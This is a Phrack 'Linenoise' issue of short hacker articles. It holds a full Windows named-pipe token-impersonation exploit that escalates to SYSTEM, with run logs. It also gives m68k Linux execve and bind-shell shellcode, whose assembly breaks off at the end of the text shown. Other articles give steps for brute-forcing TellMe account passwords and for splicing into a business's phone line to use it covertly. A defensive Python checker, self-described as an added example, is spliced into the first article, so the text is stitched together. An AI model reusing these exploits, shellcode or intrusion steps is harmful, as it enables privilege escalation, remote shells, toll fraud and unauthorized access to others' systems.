                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3d, Phile #0x03 of 0x0f

|=---------------------=[ L I N E N O I S E ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|

Everything that does not fit somewhere else can be found here. Corrections and additions to previous articles, short articles, or articles that just don't make it... everything.

Contents

  1 - Windows named pipes exploitation                 by DigitalScream
  2 - How to hack into TellMe                          by Archangel
  3 - Shitboxing                                       by Agent5
  4 - PalmMap v1.6 - Nmap for Palm                     by Shaun Colley
  5 - Writing Linux/mc68xxx shellcode                  by madcr
  6 - Finding hidden kernel modules (the extreme way)  by madsys
  7 - Good old floppy bombs                            by Phrick

|=-----------------------------------------------------------------------=|
|=-=[ 1 - Windows named pipes exploitation ]=----------------------------=|
|=-----------------------------------------------------------------------=|

by DigitalScream / SecurityLevel5

All current versions of the Microsoft Windows family of operating systems are based on the Windows NT kernel. This has a positive impact on both the remote and the local security of the Windows world. There are still some weak spots, though, which allow a user to obtain Local System privileges on the local computer, leading to full system compromise. Usually this is because of buffer overruns on the stack or heap in system services, as with any operating system. However, we should not forget about system-specific bugs caused by abnormal behaviour of system functions. Such bugs are very system dependent and are discovered from time to time in different operating systems; of course, Windows is no exception. Specific bugs usually have an impact on local users. This is not an axiom, but a local user has access to a larger part of the system API than a remote one.
So, we are talking about the possibility for a local user to escalate his privileges. By privilege escalation we mean obtaining the privileges of Local System, so as to have no limitations at all. There are a few ways to get them; I will talk about a new one.

According to MSDN, to launch an application under a different account one must use the LogonUser() and CreateProcessAsUser() functions. LogonUser() requires the username and password of the account we need. The task of LogonUser() is to set the SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME privileges on the access token; these privileges are required by CreateProcessAsUser(). Only system processes have them; in fact the 'Administrator' account does not have enough rights for CreateProcessAsUser(). So, to execute some application, e.g. 'cmd.exe', under the LocalSystem account we must already have that account. Since we do not have the username and password of a privileged user, we need another solution.

In this paper we will obtain 'LocalSystem' privileges through the file access API. To open a file, a Windows application calls the CreateFile() function, defined below:

    HANDLE CreateFile(
        LPCTSTR lpFileName,
        DWORD dwDesiredAccess,
        DWORD dwShareMode,
        LPSECURITY_ATTRIBUTES lpSecurityAttributes,
        DWORD dwCreationDisposition,
        DWORD dwFlagsAndAttributes,
        HANDLE hTemplateFile
    );

To open a file we must call something like:

    HANDLE hFile;
    hFile = CreateFile(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

For an advanced Windows programmer it is clear that this function has more uses than only opening ordinary files. It is used to open or create files, directories, physical drives, and various resources for interprocess communication, such as pipes and mailslots. We will be concerned with pipes. Pipes are used for one-way data exchange between a parent and a child, or between two child processes. All read/write operations are close to the same operations on files.
Named pipes are used for two-way data exchange between a client and a server, or between two client processes. Like pipes, they resemble files, but they can also be used to exchange data over the network. An example of named pipe creation is shown below:

    HANDLE hPipe = 0;
    hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL);

|=----------------------------------------------------------------------=|

A named pipe's name can vary, but it always has a predefined format. An example of a valid name is '\\.\pipe\GetSys'. On Windows, the '\\.\' sequence always precedes the filename, e.g. if "C:\boot.ini" is requested the system actually accesses '\\.\C:\boot.ini'. This format is compatible with the UNC standard.

With basic knowledge of named pipe operations we can suppose there may be a way to fool an application into accessing a named pipe instead of the user-supplied file. For example, if we created the named pipe "\\.\pipe\GetSys" we can try to force the application to access "\\ComputerName\pipe\GetSys". It gives us a chance to manipulate the access token. An impersonation token is an access token with the client's privileges; that is, it is the possibility for a server to do something on the client's behalf. In our case the server is the named pipe we created. And it becomes possible because we are granted the SecurityImpersonation level for the client. More precisely, we can obtain that level. If the client application has the privileges of Local System, we get access to the registry, to process and memory management, and to other possibilities not available to an ordinary user.

This attack can easily be realised in practice. The attack scenario for this vulnerability is as follows:

  1. Create the named pipe.
     Wait for the client to connect after the named pipe is created.

  2. Impersonate the client.
     Because we assume the client application has system rights, we will have them too.

  3. Obtain the required rights.
     In fact, we need only
       - SE_ASSIGNPRIMARYTOKEN_NAME
       - SE_INCREASE_QUOTA_NAME
       - TOKEN_ALL_ACCESS
       - TOKEN_DUPLICATE
     This is all we need for the CreateProcessAsUser() function. To obtain these rights we need a new token with the TOKEN_ALL_ACCESS privilege, and we can get it because we have the privileges of the client process.

  4. Execute code of our choice.
     It could be registry access, setting some hooks, or arbitrary commands with system privileges. The last one is the most interesting, because we can execute a standalone application of our choice for our specific needs.

As was said before, now I can execute CreateProcessAsUser() with system privileges. I am back at the beginning, but this time I have all the required privileges and 'LocalSystem' is under my thumb.

There is no problem realising this approach. As an example, we will use the working exploit by wirepair at sh0dan.org, based on the code of maceo at dogmile.com.

    #include <windows.h>
    #include <stdio.h>

    int main(int argc, char **argv)
    {
        char szPipe[64];
        DWORD dwNumber = 0;
        DWORD dwType = REG_DWORD;
        DWORD dwSize = sizeof(DWORD);
        HANDLE hToken, hToken2;
        PGENERIC_MAPPING pGeneric;
        SECURITY_ATTRIBUTES sa;
        DWORD dwAccessDesired;
        PACL pACL = NULL;
        PSECURITY_DESCRIPTOR pSD = NULL;
        STARTUPINFO si;
        PROCESS_INFORMATION pi;

        if (argc != 2) {
            fprintf(stderr, "Usage: %s <command>\n", argv[0]);
            return 1;
        }

        memset(&si, 0, sizeof(si));
        sprintf(szPipe, "\\\\.\\pipe\\GetSys");

        // create named pipe "\\.\pipe\GetSys"
        HANDLE hPipe = 0;
        hPipe = CreateNamedPipe(szPipe, PIPE_ACCESS_DUPLEX,
                                PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, NULL);
        if (hPipe == INVALID_HANDLE_VALUE) {
            printf("Failed to create named pipe:\n %s\n", szPipe);
            return 2;
        }
        printf("Created Named Pipe: \\\\.\\pipe\\GetSys\n");

        // initialize security descriptor to obtain client application privileges
        pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, SECURITY_DESCRIPTOR_MIN_LENGTH);
        InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION);
        SetSecurityDescriptorDacl(pSD, TRUE, pACL, FALSE);
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = pSD;
        sa.bInheritHandle = FALSE;

        printf("Waiting for connection...\n");
        // wait for client connect
        ConnectNamedPipe(hPipe, NULL);

        printf("Impersonate...\n");
        // impersonate client
        if (!ImpersonateNamedPipeClient(hPipe)) {
            printf("Failed to impersonate the named pipe.\n");
            CloseHandle(hPipe);
            return 3;
        }

        printf("Open Thread Token...\n");
        // obtain maximum rights with TOKEN_ALL_ACCESS
        if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken)) {
            printf("GetLastError: %u\n", GetLastError());
            return 4;
        }

        printf("Duplicating Token...\n");
        // obtain a primary token (requires TOKEN_DUPLICATE)
        if (DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation,
                             TokenPrimary, &hToken2) == 0) {
            printf("error in duplicate token\n");
            printf("GetLastError: %u\n", GetLastError());
            return 5;
        }

        // fill pGeneric structure
        pGeneric = new GENERIC_MAPPING;
        pGeneric->GenericRead = FILE_GENERIC_READ;
        pGeneric->GenericWrite = FILE_GENERIC_WRITE;
        pGeneric->GenericExecute = FILE_GENERIC_EXECUTE;
        pGeneric->GenericAll = FILE_ALL_ACCESS;
        MapGenericMask(&dwAccessDesired, pGeneric);

        dwSize = 256;
        char szUser[256];
        GetUserName(szUser, &dwSize);
        printf("Impersonating: %s\n", szUser);

        ZeroMemory(&si, sizeof(STARTUPINFO));
        si.cb = sizeof(si);
        si.lpDesktop = NULL;
        si.dwFlags = STARTF_USESHOWWINDOW;
        si.wShowWindow = SW_SHOW;

        printf("Creating New Process %s\n", argv[1]);
        // create new process as user
        if (!CreateProcessAsUser(hToken2, NULL, argv[1], &sa, &sa, true,
                                 NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
                                 NULL, NULL, &si, &pi)) {
            printf("GetLastError: %d\n", GetLastError());
        }

        // wait for the process to complete and exit
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(hPipe);
        return 0;
    }

This vulnerability gives us a chance to obtain system privileges on the local computer. The only condition is that a system process must access this channel. This condition is easy to reproduce with system services. For example:

    [shell 1]
    >pipe cmd.exe
    Created Named Pipe: \\.\pipe\GetSys
    Waiting for connection...

    [shell 2]
    >time /T
    18:15
    >at 18:16 /interactive \\ComputerName\pipe\GetSys
    New task added with code 1

    [shell 1]
    Impersonate...
    Open Thread Token...
    Duplicating Token...
    Impersonating: SYSTEM
    Creating New Process cmd.exe

Now we have a new instance of cmd.exe with system privileges. It means a user can easily obtain the privileges of Local System. Of course, reproducing this situation is easy only when there is a service that accesses files on a user's request. Because the 'at' command requires at least Power User privileges and may be used to launch cmd.exe directly, without any named pipe, this example is of no practical use.

In practice, this vulnerability may be exploited for privilege escalation by a local user if Microsoft SQL Server is installed. SQL Server runs with system privileges and may be accessed by an unprivileged user. @Stake reported a vulnerability in the xp_fileexist command. This command checks for file existence, and we can use it to access our named pipe. The attack scenario is nearly the same:

    [shell 1]
    >pipe cmd.exe
    Created Named Pipe: \\.\pipe\GetSys
    Waiting for connection...

    [shell 2]
    C:\>isql -U user
    Password:
    1> xp_fileexist '\\ComputerName\pipe\GetSys'
    2> go
    File Exists File is a Directory Parent Directory Exists
    ----------- ------------------- -----------------------
              1                   0                       1

    [shell 1]
    Impersonate...
    Open Thread Token...
    Duplicating Token...
    Impersonating: SYSTEM
    Creating New Process cmd.exe

Finally, it is good to point out that this vulnerability exists in Windows NT/2000/XP and is patched in Windows 2000 SP4 and on Windows 2003.

A big thank you to ZARAZA (www.security.nnov.ru), without whom nothing would have been possible.
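The defensive counterpart of the above is the check a privileged service should apply to a caller-supplied file name before opening it: any name that resolves into the pipe or mailslot namespace, under whatever host spelling, is refused. This is an added example, not part of the article and not the exploit author's code; the function names are my own, and the path forms it folds together are the Win32 ones the article mentions plus the forward-slash and \\?\UNC\ spellings.

```python
r"""Classify a caller-supplied Win32 path before a privileged service opens it.

A service that checks or opens files on behalf of an unprivileged caller should
refuse names that land in the named pipe or mailslot namespace, because opening
such a pipe hands its creator an impersonation token for the service."""
import re

# First path component after the \\host\ prefix that selects an IPC namespace.
_IPC_NAMESPACES = {"pipe": "pipe", "mailslot": "mailslot"}
# \\<host | . | ?>\<first component>[\rest], after / has been folded into \
_UNC_RE = re.compile(r"^\\\\[^\\]+\\([^\\]*)(?:\\|$)")


def _normalize(path):
    r"""Fold the spellings CreateFile treats as the same name: forward slashes,
    the \\?\UNC\host\... form of a UNC path, and surrounding blanks."""
    p = path.strip().replace("/", "\\")
    if p[:8].lower() == "\\\\?\\unc\\":
        p = "\\\\" + p[8:]
    return p


def classify_path(path):
    r"""Return 'pipe', 'mailslot' or 'file' for a Win32 path string.

    'file' covers plain local paths, \\.\C:\... device-namespace paths and
    UNC paths to real shares; anything whose first component under the host
    is pipe or mailslot is IPC, whatever host (., ?, localhost, a name) is
    given, since \\host\pipe\x is the pipe namespace of that host."""
    m = _UNC_RE.match(_normalize(path))
    if not m:
        return "file"
    # Win32 compares components case-insensitively and strips trailing
    # spaces and dots from each of them.
    first = m.group(1).rstrip(" .").lower()
    return _IPC_NAMESPACES.get(first, "file")


def safe_to_open(path):
    """The gate a service should apply before passing a caller's name to
    CreateFile: only ordinary files are acceptable."""
    return classify_path(path) == "file"
```

A complementary client-side mitigation in Win32 is to pass SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION in CreateFile's dwFlagsAndAttributes, which caps the pipe server's impersonation level at Identification so it cannot act with the caller's token.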
References

  [1] Overview of the "Impersonate a Client After Authentication"
      http://support.microsoft.com/default.aspx?scid=kb;[LN];821546
  [2] Exploit by maceo
      http://www.securityfocus.com/archive/1/74523
  [3] Exploit by wirepair
      http://www.securityfocus.com/archive/1/329197
  [4] Named Pipe Filename Local Privilege Escalation
      www.atstake.com/research/advisories/2003/a070803-1.txt
  [5] Service Pack 4 for Windows 2000
      http://download.microsoft.com/download/b/1/a/b1a2a4df-cc8e-454b-ad9f-378143d77aeb/SP4express_EN.exe

|=-----------------------------------------------------------------------=|
|=-=[ 2 - How to hack into Tellme ]=-------------------------------------=|
|=-----------------------------------------------------------------------=|

How to get into the Tell-Me network. (1-800-555-tell)

This is a representation of someone's thoughts. Thoughts cannot be owned by another person. Use this thought as you see fit; it is yours to duplicate or use as you please.

By Archangel (Formerly of the P.H.I.R.M.)
Archangel Systems
http://the.feds.are.lookingat.us

--------------------------------------

What is the Tell-Me system?
===========================

TellMe is a high-tech voice activated phone site with internet connectivity, and even a voice activated browser. It is the ultimate goal of TellMe to have the whole of the internet voice activated. The system is quite sophisticated by today's standards, though I'm sure that tomorrow's readers will find the efforts to be quite primitive to say the least.

A free phone call gives the listener access to news, sports, weather, etc. Even movie listings. Other areas provide for private announcements, or even voice activated web-sites. In other words, it is now possible, through TellMe, to dial a phone number, and listen to a website.

Tell me is a subsidiary of CNET, a giant (at the time of this writing) on the internet.

What security flaws were exploited?
===================================

Well, I guess it's nut-cutting time.
TellMe has a VERY SERIOUS security flaw which can allow unauthorized access to the system within a matter of hours. As I tried to hack into my own account, I realized that TellMenu announcements only have a 4 digit numeric password. Here's what you do:

  - You dial 1-800-555-tell.
  - You will get an automated banner-ad followed by a menu describing various TellMe features.
  - You must say the word "Announcements", or dial "198" on the keypad. This will take you to the announcements area.
  - Once in the announcements area, you will need to punch in the announcement number, which is a seven digit number assigned to you by the TellMe computer.
  - Type in any announcement number you wish (I tried with my own one first, as this was an experiment to see if I could hack in and change my own announcement). The computer says "Ok, here is your announcement." Then I heard a recording of The Baron telling what a wimp I am.
  - This was followed by the computer saying: Please type in another announcement number, or say "Main Menu" to continue. If you are the announcement manager, please use your telephone keypad to enter your password to edit the announcement.

If you remain silent, the computer will say: "Please enter your 4 digit password."

FOUR DIGITS????? Were they serious?

Now here's the kicker: TELLME WON'T DISCONNECT YOU IF YOU FAIL 3 TIMES IN A ROW!!! Yes, ladies and gentlemen, keep trying to your heart's content. No penalties.

Obviously a Brute Force hack was in order. I handled it by dusting off a *VERY* old wardialer. I sat on an extension line, due to the limitations of the dialer, and listened to it punching in access codes. When it succeeded, I could pause the wardialer program. I would be able to look at the screen, and see what the last couple of attempted numbers were, manually dial them in, and gain access. I know there are easier methods, but this is what I did. The Baron had mercifully chosen a low number, and I was in, changing the message in about ten minutes.

I then tried two other *SAFE* messages, that I would not get in trouble for, if changed. I gained access, respectively, in 45 and 90 minutes (More or less). My math told me that the maximum time to Brute Force a TellMe announcement was about three hours.

Is that it? No, while having the ability to change any announcement may be a lot of fun, there is a far more interesting hack that you can do on TellMe. Remember how when you first sign on, you have to say "announcements"? Try saying the word "Extensions". You may be quite surprised at what you find.

What are Tell-Me extensions?
============================

Tell-Me extensions are that part of the Tellme network, which they have offered to the world to produce the voice activated web pages. Here is what you do.

  - Say "Extensions". You will be taken to the extensions area, and asked to punch in an extension number. This is a five digit number.

It was time again for my ancient wardialer to do its stuff. (Once again, no penalty for incorrect guesses!)

First off, it is important at this point to mention that TellMe is a dying concern. Most of the extensions are empty. The only extensions still operating, are some extensions created by individual developers, Die-hard developers, and (This is important later) TellMe's *own* extensions. Apparently, the idea was to use the extension number as a kind of password, as there is no directory, and one must already know the extension number in order to gain access.

I checked into The San Remo hotel here in Las Vegas, under my girlfriend's name, and spent the night hacking. Here's what I have come up with so far:

Extension 76255:
----------------
This leads to a very bizarre game of Rock/Paper/Scissors. It is one of the weirdest things that I have ever come across in all my days. I HIGHLY suggest you try it. It is like some whiney hillbilly guy...well see fer yerself!

Extension 11111:
----------------
A gypsy with an eight ball. You ask it questions, and it gives you answers. There are no disclaimers, so I guess this is the real deal! Saying "quit" or "Stop" won't help you. Just shut the hell up, and it will kick you back into regular Tell-Me.

Extension 33333:
----------------
Produces the words "HELLO WORLD"

Extension 34118:
----------------
Produces a directory of TellMe's offices, with the regular phone numbers.

Most of the worthy extensions consisted of foul language, so anyone under 18 should stop reading now... Use the letters on your telephone keypad, and you will get some very interesting results. These are five letter words corresponding to the numbers on your phone.

CUNTS - Produces a string of numbers of unknown meaning. Just a long string of a computer voice saying "one, five, seven, three, twelve, eighty-eight" etc. I'll figure out what that means later.

TITTY - This produces a fax tone, as opposed to a computer tone. I didn't mess with it.

PENIS - This produces a verbal message about the sendmail system.

HOLES - This is the Quote of the Day.

BOOBS - This has to do with HTTP protocols.

SHIT0 - This is a directory of phone lines in the TellMe system.

FUCK0 - This is a very interesting directory of phone lines in the TellMe system. Two of the lines appear to be trusted lines, providing a computer tone which I used to log on. There was a first time user option, which gave me a manager's account. (Do they have hundreds of managers?) What can it do? I was able to delete my own account and bring it back. I didn't fuck with anyone else's account. My goal is not to destroy, but to learn.

PISS0 - As above, the TellMe system addresses me with a choice of talking to a live person, or an automated directory of phone lines. I'm amazed this is all behind a five digit password.

Damn0 - Yet another directory of trusted phone lines. This one, however, asks you for another password right up front, so I'm assuming this is a more security sensitive area!

Pussy - A description of how to configure a TellMe webpage.
Cum69 - Advice on proper password generation. (hahahahahahahahahaha!!!!)

EATME - Computer tone leading to nowhere.

The TellMe security protocols are pathetic.

Archangel (The Teflon Con)
Wrath of God
Hand Delivered
http://the.feds.are.lookingat.us

|=-----------------------------------------------------------------------=|
|=-=[ 3 - Shitboxing ]=--------------------------------------------------=|
|=-----------------------------------------------------------------------=|

by Agent5

So you're sitting in a small family owned type restaurant or you're walking through a small store looking at their various wares and, as normal every couple times a day, you hear the call of nature. You make your way towards the (preferably single occupancy) mens room (or ladies for those few that may actually read this) and enter. So you're doing your thing and you're looking around checking out your surroundings (why? cause you're supposed to be fucking observant at all times. That's why.) Your gaze takes you towards the ceiling. Looks like most cheap drop down ceilings. hmmmm.... drop down ceiling.....easily removable. So you stand on the toilet, or whatever, and take a look. You pull out your pocket flashlight and take a look. Nothing but wires. Couple electrical or telephone maybe... ..TELEPHONE? Does this mean i can sit on the throne and use the fone? Indeed it does!

All you need is a few things to help you make your dream of phreaking at its absolute laziest a reality. What you need will (besides your beigebox with a RJ-11 plug on the cord) probably cost you, at an extreme maximum, 3 bucks for parts and about 6 bucks for a telephone Line Crimper for standard telephone plugs (RJ-11). You will also need a...

  "modular line splitter - Provides two telephone jacks when plugged into the end of a telephone line cord. Standard 4-wire jacks. Color: Ivory"

----bout dollar and change max cost. Most of these parts, if not all, can be found at your local radioshack.

Now if you haven't figured out what i'm getting at yet, you should seek medical attention immediately, CAT-scans have helped me a lot. Here's what you do and make sure you do it quickly in case they try to use the telephone while the line is disconnected. SO make sure you lock the door and get to work fast....if you have people beginning to knock on the door just make some nasty shitting sounds and say you'll be out in a minute.

  1. Cut the line. (no specific tools needed, something sharp will do)
  2. Attach a plug to either end of the line you have just cut.
  3. Put one end of the plug in one end of the modular line splitter, put the one that's left into one of the two holes on the front of the splitter.
  4. Now you can either leave and let the intestinally distressed old guy pounding on the door in, or you can plug your beige box in and have some fun.

Treat this as you would any other beige boxing session. Keep in mind that the people who own the telephone line may want to use it too and may not enjoy having someone on the line already. But for the most part this ordinary bathroom has just become your private telephone booth, complete with running water and a toilet for the astronomical sum of 3 dollars US.

"This file brought to you by the makers of sharp things."

Shoutouts to Epiphany, Bizurke, Master Slate, Ic0n, Xenocide, Bagel, Hopping Goblin, Maddjimbeam, lioid, emerica, the rest of the #mabell ninjas, port7 alliance, and LPH crew.

|=-----------------------------------------------------------------------=|
|=-=[ 4 - PalmMap v1.6 - Nmap for Palm ]=--------------------------------=|
|=-----------------------------------------------------------------------=|

(submitted by Shaun Colley)

-----BEGIN PALMMAP-----
# PalmMap.bas
# PalmMap v1.6 - Nmap for Palm.
fn set_auto_off(0)
s$(0) = "Host:"
s$(2) = "Start Port:"
s$(4) = "End Port:"
f = form(9, 3, "PalmMap v1.6")
if f = 0 then end
if f = 2 then gosub about
let h$ = s$(1)
let p = val(s$(3))
let e = val(s$(5))
let i = p
let t$ = "PalmMap.log"
open new "memo", t$ as #4

form2:
cls
form btn 30, 40, 40, 18, "connect()", 1
form btn 85, 40, 40, 18, "TCP SYN", 1
form btn 60, 80, 40, 18, "UDP scan", 1
form btn 60, 120, 40, 18, "TCP FIN ", 1
draw "Scan type?", 50, 20, 1
while x = asc(input$(1))
  if x = 14 then gosub scan
  if x = 15 then print "Scan type not implemented as of yet."
  if x = 16 then print "Scan type not implemented as of yet."
  if x = 17 then print "Scan type not implemented as of yet."
wend

sub scan
  cls
  print at 50, 40
  while (i <= e)
    c = fn tcp(1, h$, i)
    if (c = 0)
      print "Port ", i, "Open"
      fn tcp(-1, "", 0)
      print #4, "Port ", i, "Open"
    else
      fn tcp(-1, "", 0)
      print #4, "Port ", i, "Closed"
    endif
    let i = i + 1
  wend
  close #4
  print "Scan complete!"
end

sub about
  cls
  msgbox("PalmMap - Nmap for Palm.", "About PalmMap 1.6")
-----END PALMMAP-----

|=-----------------------------------------------------------------------=|
|=-=[ 5 - Writing Linux/mc68xxx Shellcodez ]=----------------------------=|
|=-----------------------------------------------------------------------=|

by madcr (madrats@mail.ru)

  I   Introduction.
  II  Registers.
  III Syscalls.
  IV  Execve shellcode.
  V   Bind-socket shellcode.
  VI  References.

I. Introduction.

Motorola's history begins as early as 1920, when it produced radio components and nothing was yet known about computers. Only in 1974 did Motorola release its first 8-bit microprocessor, the MC6800, containing 4000 transistors, and in 1979 Motorola announced its first 16-bit processor, the MC68000, capable of processing up to 2 million operations per second. Five years later, in 1984, Motorola released its first 32-bit processor, the MC68020, containing 200000 transistors.
Up to and including 1994 Motorola kept improving the series, and as a result, in March of that year, released the MC68060 processor, containing 2.5 million transistors. Today the 68060 is the optimal processor for running any unix.

The processor works in two modes: User and Supervisor. This is not analogous to real and protected mode on x86 processors; it is a kind of "just in case" protection. In user mode it is impossible to raise exceptions and impossible to access the whole memory area. In supervisor mode everything is accessible. Accordingly, the kernel works in Supervisor mode and everything else in User mode.

MC68 is supported by various unix vendors: netbsd, openbsd, redhat linux, debian linux, etc. This article focuses on linux (debian in particular).

II. Registers.

The processor is essentially CISC (though it has some RISC features), so there are not many registers:

  Eight data registers: %d0 to %d7.
  Eight address registers: %a0 to %a7.
  The status register: %sr.
  Two stack pointers: %sp and %fp.
  The program counter: %pc.

Basically we need nothing more. And the minimal set of instructions required for developing shellcode:

  instruction   example                 description
  move          movl %d0,%d1            put the value of %d0 into %d1
  lea           leal %sp@(0xc),%a0      compute the address at displacement 0xc in the stack and put it in %a0
  eor           eorl %d0,%d1            xor
  pea           pea 0x2f2f7368          push '//sh' onto the stack

In total these 4 instructions are enough to write a functional shellcode :). And now it is time to talk about the fifth, most important instruction (the fifth that we need, I mean) and about exceptions. The trap instruction raises an exception. Motorola processors have only 256 exceptions, and of all of them we need only one: trap #0. On mc68 linux this exception calls into the kernel to execute a system call. Trap 0 refers to a vector located at address $80 (a strange coincidence).
Now we shall look at system calls in more detail.

III. System Calls.

System calls on this architecture are organised as follows:

  %d0            - number of the system call.
  %d1, %d2, %d3  - arguments.

So, to make a trivial setuid(0) we get something unpretentious:

    eorl %d2,%d2
    movl %d2,%d1
    movl #23,%d0
    trap #0

Rather simple.

IV. Execve shellcode.

So, we start as always with good old execve:

    .globl _start
    _start:
    .text
            movl #11,%d0    /* execve() (see unistd.h) */
            movl #m1,%d1    /* /bin/sh address */
            movl #m2,%d2    /* NULL */
            movl #m2,%d3    /* NULL too */
            trap #0
    .data
    m1: .ascii "/bin/sh\0"
    m2: .ascii "0\0"

    # as execve.s -o execve.o ; ld execve.o -o execve
    # ./execve
    sh-2.03# exit
    exit
    #

Such code will not do, since it is not position-independent and has not been checked for zero bytes. Therefore we rewrite it with the help of the stack (since the machine is big endian, the byte order has to be taken into account):

    .globl _start
    _start:
            moveq #11,%d0           /* execve() */
            pea 0x2f2f7368          /* //sh */
            pea 0x2f62696e          /* /bin (big endian) */
            movel %sp,%d1           /* /bin/sh in %d1 */
            eorl %d2,%d2            /* pea 0x0 while avoiding */
            movel %d2,%sp@-         /* a zero byte */
            pea 0x130               /* pea 0030 -> 0130 = kill the zero */
            movel %sp,%d2           /* NULL in %d2 */
            movel %d2,%d3           /* NULL in %d3 */
            trap #0                 /* syscall */

    # as execve2.s -o execve2.o ; ld execve2.o -o execve2
    # ./execve2
    sh-2.03# exit
    exit
    #

Very well.
Now we turn it into a byte string and see how it works:

    char execve_shellcode[] =
        "\x70\x0b"                      /* moveq #11,%d0 */
        "\x48\x79\x2f\x2f\x73\x68"      /* pea 0x2f2f7368 -> //sh */
        "\x48\x79\x2f\x62\x69\x6e"      /* pea 0x2f62696e -> /bin */
        "\x22\x0f"                      /* movel %sp,%d1 */
        "\xb5\x82"                      /* eorl %d2,%d2 -> */
        "\x2f\x02"                      /* movel %d2,%sp@- -> pea 0x0 */
        "\x48\x78\x01\x30"              /* pea 0x130 */
        "\x24\x0f"                      /* movel %sp,%d2 */
        "\x26\x02"                      /* movel %d2,%d3 */
        "\x4e\x40";                     /* trap #0 */

    int main()
    {
        int *ret;
        /* overwrite the saved return address with the shellcode address */
        ret = (int *)&ret + 2;
        *ret = (int)execve_shellcode;
        return 0;
    }

    # gcc execve_shellcode.c -o execve_shellcode
    # ./execve_shellcode
    sh-2.03# exit
    exit
    #

Our shellcode. Perfect. But certainly this is not enough, so we shall bind this shellcode to a socket.

V. Bind-socket shellcode.

To begin with, we write our code in C:

    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>

    int main()
    {
        int fd, dupa;
        struct sockaddr_in se4v;

        fd = socket(AF_INET, SOCK_STREAM, 0);
        se4v.sin_port = 200;            /* no htons needed: m68k is big endian */
        se4v.sin_family = 2;
        se4v.sin_addr.s_addr = 0;
        bind(fd, (struct sockaddr *)&se4v, sizeof(se4v));
        listen(fd, 1);
        dupa = accept(fd, 0, 0);
        dup2(dupa, 0);
        dup2(dupa, 1);
        dup2(dupa, 2);
        execl("/bin/sh", "sh", 0);
        return 0;
    }

    # gcc -static bindshell.c -o bindshell &
    # ./bindshell &
    [1] 276
    # netstat -an | grep 200
    tcp        0      0 0.0.0.0:200             0.0.0.0:*               LISTEN
    # telnet localhost 200
    Trying 127.0.01...
    Connected to localhost.
    Escape character is '^]'.
    echo aaaaaaaaaaaa
    aaaaaaaaaaaa
    ctrl+c
    [1]+  Done                    ./bindshell

Everything works. Now the last thing that interests us is how network operations are done.

    # gdb -q ./bindshell
    (gdb) disas socket
    Dump of assembler code for function socket:
    0x80004734 :    moveal %d2,%a0
    0x80004736 :    moveq #102,%d0
    0x80004738 :    moveq #1,%d1
    0x8000473a :    lea %sp@(4),%a1
    0x8000473e :    movel %a1,%d2
    0x80004740 :    trap #0
    0x80004742 :    movel %a0,%d2
    0x80004744 :    tstl %d0
    0x80004746 :    bmil 0x80004958 <__syscall_error>
    0x8000474c :    rts
    0x8000474e :    rts
    End of assembler dump.
    (gdb)

Perfect. As everywhere: 102 = socket_call, 1 = sys_socket (for the full list look at net.h).
Proceeding from the above, we write it in assembler:

    .globl _start
    _start:

    /* socket(AF_INET,SOCK_STREAM,0); ----------------------------------------- */
    /* af_inet - 2, sock_stream - 1, ip_proto0 - 0 */

            moveq #2,%d0
            movl %d0,%sp@           /* AF_INET */
            moveq #1,%d0
            movel %d0,%sp@(0x4)     /* SOCK_STREAM */
            eorl %d0,%d0
            movl %d0,%sp@(0x8)
            movl %sp,%d2            /* put in d2 the stack address where our argv is */
            movl #0x66,%d0          /* socketcall (asm/unistd.h) */
            movl #1,%d1             /* sys_socket (linux/net.h) */
            trap #0                 /* go through vector 80 */

    /* bind(socket,(struct sockaddr *)&serv,sizeof(serv)); -------------------- */

            movl %d0,%sp@           /* d0 holds the returned socket descriptor */
            move #200,%d0
            movl %d0,%sp@(0xc)      /* port number */
            eorl %d0,%d0
            movl %d0,%sp@(0x10)     /* sin_addr.s_addr=0 */
            moveq #2,%d0
            movl %d0,%sp@(0x14)     /* sin_family=2 */

    /* Compute the address where the constants of the second argument lie */
    /* and put that address in place as the second argument */

            leal %sp@(0xc),%a0
            movl %a0,%sp@(0x4)
            moveq #0x10,%d0
            movl %d0,%sp@(0x8)      /* third argument 0x10 */
            movl #0x66,%d0          /* socketcall (asm/unistd.h) */
            movl #2,%d1             /* sys_bind (linux/net.h) */
            trap #0                 /* go through vector 80 */

    /* listen(socket,1); ------------------------------------------------------ */
    /* the socket descriptor is already in the stack */

            moveq #1,%d0
            movl %d0,%sp@(4)
            /* d2 already holds the address of the start of the arguments in the stack */
            movl #0x66,%d0          /* socketcall (asm/unistd.h) */
            movl #4,%d1             /* sys_listen (linux/net.h) */
            trap #0                 /* go through vector 80 */

    /* accept(fd,0,0); -------------------------------------------------------- */

            eorl %d0,%d0
            movl %d0,%sp@(4)
            movl %d0,%sp@(8)
            movl #0x66,%d0          /* socketcall (asm/unistd.h) */
            movl #5,%d1             /* sys_accept (linux/net.h) */
            trap #0                 /* go through vector 80 */

    /* dup2(cli,0); ----------------------------------------------------------- */
    /* dup2(cli,1); ----------------------------------------------------------- */
    /* dup2(cli,2); ----------------------------------------------------------- */

            movl %d0,%d1
            movl #0x3f,%d0
            movl #0,%d2
            trap #0
            movl %d0,%d1
            movl #0x3f,%d0
            movl #1,%d2
            trap #0
            movl %d0,%d1
            movl #0x3f,%d0
            movl #2,%d2
            trap #0

    /* execve("/bin/sh"); ----------------------------------------------------- */

            movl #11,%d0            /* execve */
            pea 0x2f2f7368          /* //sh */
            pea 0x2f62696e          /* /bin */
